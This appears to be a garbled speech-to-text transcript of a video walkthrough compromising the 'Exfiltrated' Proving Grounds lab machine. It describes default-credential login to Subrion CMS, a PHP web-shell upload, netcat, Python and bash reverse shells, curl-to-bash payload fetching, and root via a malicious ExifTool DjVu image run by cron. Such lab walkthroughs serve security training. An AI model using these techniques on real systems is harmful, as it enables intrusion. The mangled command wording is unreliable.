Hi everyone, welcome to my channel. So we are going to perform an attack of penetration test to exfiltrated machine of proving grounds. Is a Linux machine. Let me see. Inside of the directory streamings, we are going to create exfiltrated inside of the name of machine cd exfiltrated. So we are going to create an nmap scripts and exploits directories. So inside of nmap we are going to perform a recognition of the service and exposed ports of this machine. So I'm using this custom tool. Yes, it's this one that perform a couple of operations with nmap. The first one obtain the ports, and the second one review the common service and versions this server. So we can execute to an scan port over the target machine. Yeah. So has only two open ports. The first one is the SSH. It's a Linux machine. This is the protocol. OpenSSH is the version of the service, and the second one is an Apache web server at port 18. So the idea is access using the browser to the target machine, the port. I don't remember say you, but you need to include at etc host the exfiltrated virtual host name and the target IP. I just included it before the video. So we are going to review the web page. It seems a CMS. It seems a blog. So this is the login. So maybe we can use admin and admin, and voila, this is magic. The default credentials are admin, and we are inside of the blog. So administrator my profile. This is the administrator profile. Favors, phones, logout. So no activities, administrator, member, admin. So powered by, it's a powered by Subrion 4.2. Subrion, it's a CMS, so search exploit using Subrion. Remember that is the 4.2.1 that contain an avatar path, XSS injection, arbitrary file upload. I think this could be the most interesting. Arbitrary file upload. Execute the uploaded file over the Surbion -m. Yeah, exfiltrated. Let me cut this one. So user store target panel. So it's a panel URI/panel. So maybe this panel exists or not exist. Just thinking. Yes, it's an administrator panel. So we are inside and we can review this one. Yes, I remember this one. We need to um, upload file, select file. Yes, you should create a PHP file, but it should contain uh, .phar header for this operation. So let me show you how to do this. I think that we are not going to use this exploit because I prefer do it manually, and I can show you how to do it. Inside of exploit, for example, we can write echo on. This is a reverse PHP. For example, system $request to cell.php. Yes, is this one. So we can move it from cell.php to cell phrr. So this is another kind of PHP executable file. We have the remote command execution using this file, this kind of file. So we are going to upload it inside of streamings, and inside of streaming, this is the Exfiltered, and inside of scripts, not inside of exploits, we have this one. We can review where is it info and say this is the upload directory. So if we include cmd parameter and say who am I, yeah, this is 3w data. So perfect. We are obtained remote code execution. So for example, this is cat atc pass wd. This is the content of the file. So for example, this is home coram, that is a user that has been bashed. For this reason, I think that it has a directory and it contains the user flag. So we can obtain the user flag using this remote command. Sorry, this is home coram. Maybe inside of desktop, I don't know if it's desktop. Maybe we can use an ls command. Oh, we don't have permissions, so sorry. Maybe we can use the proxy inside of this. Set the proxy, open the barb suite. Yes. Okay, close. Next. for example here ID, and is waiting for us. I send the request to repeater and forward this one. At the repeater we can set the request and obtain the response here. So what I want to do, I want perform a reverse shell command execution to my attacker machine. So I need obtain my attacker IP with if config this one. Okay, so right now I can netcat. I can use netcat too. Yeah, why not? VNLP at port 4043. Yeah, 4043. Here I can do netcat minus e. This is being bus at the target server. So this is my attacker machine, and this is the port 4443. So this command don't work is and should be encode over the network and send the request. Don't work. So let me check this one. So send like this. No. Maybe I should looking for example Python reverse shell, or yes, Python reverse shell cheat sheet. Yeah, so the first one should be review is what version of Python is installed at this Linux. So Python minus minus version, yeah, and this command should be encoded too from this to this. Control U. And don't respond because Python is not exist, and Python 3, yeah, it responds. So it seems that we can include a Python 3 command like this one here, and I need to put my attacker IP at this part. Yes, perfect. And the port could be 4443. Pray. Yeah, so yeah, perfect. Who am I? 3W data. So Python 3 minus C import PTE PTE, so spawn bin bash shell. It is like it. Spawn is run better. Yes, an error. Spawn like this. Bin bash close double quotes, close the quotes, and yeah. Who am I? ID. Yes. So what is this? This is my cell. Here there are nothing important. So cat robots robots.txt. This is the fuzzing file usually we found. So cat robots.txt. It say that these directories don't allow but the searcher by default. Motor engines such Google or others, Surbion, 3W, HTML. So there are no user flag here. What is it? Yes. So a TMP directory. Yeah. What happened? Yeah. We are going to looking for the LSA script. Copy it to scripts directory, go to scripts scripts directory. We are going to upload a Python server, Python simple HTTP server at port 9090. So wget my attacker IP. What is my attacker IP? This one, and the listening port and the script that I want to download here. So it's wrong bracket. HTTP. So I can copy this one here. Yeah. Nice fetch mode. LSA.sh. Perfect. We are going to execute this one -L1. Proceed. There are two users. Yeah, this is the etc path variables. So it's looking for writable files outside of user home, binaries with setuid included. So this is uncommon setuid. This is for snaps of Linux. The useful common binaries, the capabilities, PHP helper, bind service, admin, wrap, net wrap, AP. So systemd, listen port, and it's finished. So if we review the cron tab, scripts, we found that there are one that execute uncommon script. We are looking for this one because it's executed by root. Let me review it. So has a permission of read and execute, but not writing permission for other user. So it's more difficult than this one. So what is do is exif metadata. So clean the metadata directory, obtain the image that we upload to this directory. Is the uploaded directory. Yeah, when we have DCL, obtain the path of metadata, and the file is sorry, and the file is the OpenSSL command run hexadecimal 5. So execute this command for log file. This is the log file, yes. But the important is this binary exif tool. So this exif tool has a known vulnerability. Oh, I missed the. So let me check it. Exif tool vulnerability exploit exif tool exploit as master. So remote command execution payload need the deja vu. Yes, need the deja vu. Use socket TCP image. So the payload is the code base 64 contains this one. Use socket, launch a socket. So payload explodes deja vu def null payload bc8. So let me review deja vu make privilege escalation conclusion privilege escalation so deja vu make bash into setuid deja vu make used to create a POC file. Questions? So but we don't have a POC. We need create a payload bset payload to payload bset and exploit deja vu should be this one. So not bad, we are going to use it. The first one is with some modification. The first one is obtain again the reverse shell because I miss it. Launch it, this one again. So it seems that don't work. Yes, is this one? Yes. So Python 3 -c. This is import pte pte spawn bin was yes, like this. So the first one is create the malicious file with content exploit. So maybe I can use existing payload, like for example, um, um, mm, mm, Kali. I'm installing the Deja Vu library, so I need a little bit time that I'm going to use for find a specific payload. So reading package list, audio repository. So let me install this one. Yeah, it's already installed. So maybe with this one is in Node. I want perform this one stitch mode plus s to bin vas. This is all that I need for perform the attack. Yeah, it seems that look nice. Echo, this is my payload. Payload like this. Problem with a quote. What is the problem? Yes, it should be close here. Yes, right now. Basetrap quote. So yes, like this. Mm, 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 mm. Like this. Double quote. So let me check this one. No problem. So at let me text editor. With text editor I can modify this one and do this. This is stitch mode plus x plus s to bin vas. So I can do this bin payload, and inside of payload this one. Yes, so cat payload. Perfect. So at this point, close without save. Follow the previous while throw. It's BCC. I need to do payload to payload BCC. So we change the format. So file of payload right now is BCC data, and file of payload is htTest. So we can cut payload BCC, and it's a raw data. So we need deja vu at this point. Deja vu make. We need to say exploit dot deja vu and we need to include the info that is the 1.0. It's our first exploit. So bg gp, we say is dev null, and set is our payload, payload dot bcc. So we create a new exploit, payload bcc. So at this point, if exif tool, I don't know if it's this version, but we can check it. Payload bcc with sudo unknown file permissions. Maybe if we review the vin vas, no, don't work. So I don't know if it attack is going to work at the target server. Maybe I need to review this one. This info is dot on exploit deja vu. Channels type bg is bg, sorry, bg gp, and yeah, now looks better. So let me check right now. Not. If I do switch mode cat payload, if I perform switch mode plus s to vin vas with sudo permissions, this looked like this. Why not? It seems that this exploit don't work properly, so I need looking for a new one. This is a cp vim vas to another vas. Yeah, but this guy do the same. Yeah, slash. Okay, we can perform another operation such for example, reverse shell with netcat. No, is another solution. Maybe this should be like this. Vim shell dot sh. So at this point we say this one. This is vim vas, and inside we can say netcat minus e, and this is a vim vas to my attacker AP if config with this one to the port 4545. So it's perfect. So switch mode plus x. This is the shell dot sh So at this point, if I listen at local minus a minus NLVP at port 4545 and I execute this cell, perfect, the cell arrive. Okay, so the next step is try it, this one, from the attacker machine, and the attacker machine could be HTTP my attacker my from the target machine. Sorry, my attacker machine is this one. This is the cell dot sh. Perfect. So here with Python 3 with a simple server, we can, the first one, obtain the reverse shell, the second one execute it maybe with bash, I don't know, and spawn, yes, bash, but not arrive. So with curl we can do this one, because don't send to the file. Curl command, obtain, but don't work as expected. If I perform netcat minus e vin vash to the attacker IP at port 4545, we obtain the same error. So the problem is the chosen reverse shell payload. So I can choose another one, for example Python 3 or bash reverse shell cheat sheet payloads, all the things. So maybe minus C, with minus C this work, netcat minus C to the attacker machine, the 4545 port, yes, don't work. So this netcat is another version. We need to use for example bash using TCP, look nice. Maybe using this terminal, the sorry, this one, this could be 45 and this one my attacker IP. So I don't remember my attacker IP, it's here. Yes, so it don't work at local but should work the target server. Yes, perfect. So this is the exploit that I won't include inside of this cell. Right now I'm modify my cell exploit and I include this one because it's working on the target server. So if I upload again this one and I upload again this one with one command line, this curl, it's going to first one download the new script. Second one, perform the execution using the bus pipette, because you pipette the output to the bus, and when it obtain the interpreted bus spawned, send me a new cell to my attacker machine. So let me see. Yes, perfect. So who am I? 3W data. So now it's working, and we need create a malicious file that execute this one with deja vu like before. So let me history pipe grip deja vu make no, it's not here, maybe it's here. This is history, deja vu. Okay, deja vu make, the first one is obtain the payload and modify it to BCC. So the BCC command is this one. We need modify the payload to this. Okay. But we need include the new execution payload. The new execution payload is this one, is curl and bus. This is the execution that I'm looking for to this place. X insert this one. Yeah, this is the new payload. So right now we need BCC the payload to payload BCC set. So it seems that only that you need is modify this one. Oh, maybe instead of do this, is I think that. So the exploit should be moved to exploit for example GPG. Okay, this kind of image. So I can perform right now the let me review vin vas. So chmod minus s to vin vas and sudo yes, right now has the same permissions. So if I perform the exif tool operation sudo to this exploit GPG, maybe and only maybe execute our exploit to the no, don't work. So I need perform again the exploitation. So history deja vu make is this one. The new payload is going to be created. We should modify like this. Perfect. So right now I need to launch again my server here and the other server here. So at the upload directory I need obtain the exploit GPG TTP. So what is my attacker IP again? So if config this one to the port 9090, yes, and this is exploit, so gpc or git http to this. Connecting. So I need again this one, send, so pwd, so it http // and this one. So here, yes, it's just uploaded. So this is the GPG file. So if all work fine, should obtain remotely the the file of my shell, yeah, and show me the reverse shell. So who am I? Who am I? Root. So inside of home we can find the quarant user. So this is the local cat local txt flag, and inside of root we found the proof txt flag. So the most important thing here is understand the vulnerability of the exploit that we reviewed previously, that is Exfiltered exploit. Using this vulnerability of the binary, we can use the cron tab job in order to obtain a root shell. So this is all. Name minus a name minus a, yeah, and if config, yeah, this is the target IP. I hope that you learn and enjoy. See you.